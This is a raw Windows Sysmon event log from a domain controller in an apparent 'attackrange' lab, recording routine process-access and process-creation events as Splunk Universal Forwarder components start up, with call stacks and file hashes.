13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-436E-6000-F700-000000009A01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436E-6000-F700-000000009A01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-436E-6000-F700-000000009A01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.197{08A6967A-436F-6000-F800-000000009A01}40284608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436F-6000-F800-000000009A01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-436F-6000-F800-000000009A01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.040{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436F-6000-F800-000000009A01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:19.041{08A6967A-436F-6000-F800-000000009A01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4370-6000-F900-000000009A01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 